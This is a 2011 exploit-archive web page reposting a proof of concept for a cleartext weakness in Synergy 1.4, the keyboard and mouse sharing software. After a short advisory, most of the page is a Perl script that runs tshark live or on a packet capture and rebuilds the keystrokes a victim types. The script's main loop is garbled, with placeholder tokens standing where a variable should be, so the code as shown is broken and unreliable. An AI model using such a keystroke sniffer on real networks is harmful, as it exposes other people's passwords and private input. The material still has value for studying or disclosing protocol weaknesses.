首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Synergy 1.4 Protocol Cleartext Weakness Proof Of Concept
来源:vfocus.net 作者:Sw1tCh 发布时间:2011-04-08  
# Exploit Title: Synergy Protocol cleartext weakness PoC
# Date:April 5th 2011
# Author: Sw1tCh
# Software Link: http://synergy-foss.org/
# Version: 1.4

# -= Info =-
*Synergy* is *Free and Open Source Software* that lets you easily share your
mouse and keyboard between multiple computers, where each computer has it's
own display. No special hardware is required, all you need is a local area
network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~
Synergy-foss.org]

#-= The Advisory =-
Synergy's sends all keystrokes and mouse movements in clear text.  This
presents a huge vulnerability because if anyone is capturing packets on the
network, they could eavesdrop on all information passed between the multiple
computers.

# -= PoC Script =-



#!/usr/bin/perl
#
# synergyCap.pl - Developed by Sw1tCh to show the insecurity in Synergy
Deskop Sharing application
# The program works a lot better when through a closed network of one type
of another
# [such as an SSH tunnel]
# [Note: The text isn't clear.  Because of the protocol, text is sent in TCP
and even with protocol
# Standards, text does come out of order.
##########################
#
# Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's
#
##########################

use constant BANNER => q{

        /  /           synergyCap -> Live or Forensic extractor of text
passeed
     /        /         from computers using Synergy Screen sharing
    / <( - )>  /
    /          /       PoC Developed by Sw1tCh 2011
     /        /       -> Need to work on my tshark filters...My perl is
better :)
        /  /
           Softward -> Synergy - http://synergy-foss.org/

        Usage:
        - synergyCap.pl -forensic -file [FILE]
        - synergyCap.pl -live -interface [device {example eth0} ]

};


# ----- INCLUDES ----- #
use strict;
use warnings;
use Getopt::Long;
use Switch;
use Time::HiRes qw( usleep sleep );
use Term::ANSIColor qw(:constants);
local $Term::ANSIColor::AUTORESET = 1;

 print BOLD BLUE BANNER;
print "\n";

my $forensic = 0;
my $live = 0;
my $options = "";
my $capChar = "";

GetOptions (
'forensic' => \$forensic ,
'live' => \$live ,
'file'  => \my $pcap_file ,
'interface'  => \my $interface ,

);

unless ( $ARGV[0]  ) { print "ERROR : Bad file or Interface\n"; exit; }
unless ( $live || $forensic ) { print "ERROR : No Option Specified [Live /
or / Forensic \n"; exit; }


if ( $live =~ m/1/ ) { $options = "i"; }
elsif ( $forensic =~ m/1/ ) { $options = "r"; }

open( TSHARK , "tshark -". $options . " " . $ARGV[0] ." -V |" ) or die
"Failed to open TSHARK: $!";

while( <TSHARK> )
{
if (
___FCKpd___0
=~ /Key Id/) { if(
___FCKpd___0
=~ s/Key Id\x3A\s//) { if (
___FCKpd___0
< 128){ print " " . chr(
___FCKpd___0
) . "\n"; $capChar = $capChar. chr(
___FCKpd___0
); } } } } print "\n\n$capChar "; print "\n---+ Completed +--- \n"; close( TSHARK ); #Credits: Sw1tCh #Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's -- NULL, NULL NULL NULL NULL NULL NULL NULL NULL.NULL (NULL) NULL - NULL

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wamp Webserver 2.1 File Downlo
·Joomla! com_virtuemart <= v1.1
·Graugon Forum 1.3 SQL Injectio
·Microsoft Windows xp AFD.sys L
·MPlayer (r33064 Lite) Buffer O
·Libmodplug ReadS3M Stack Overf
·Zend Server Java Bridge Arbitr
·IrfanView 4.28 - ICO With Tran
·IBM Lotus Domino iCalendar MAI
·IrfanView 4.28 - ICO Without T
·Xilisoft Video Converter Ultim
·MikeyZip 1.1 .ZIP File Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved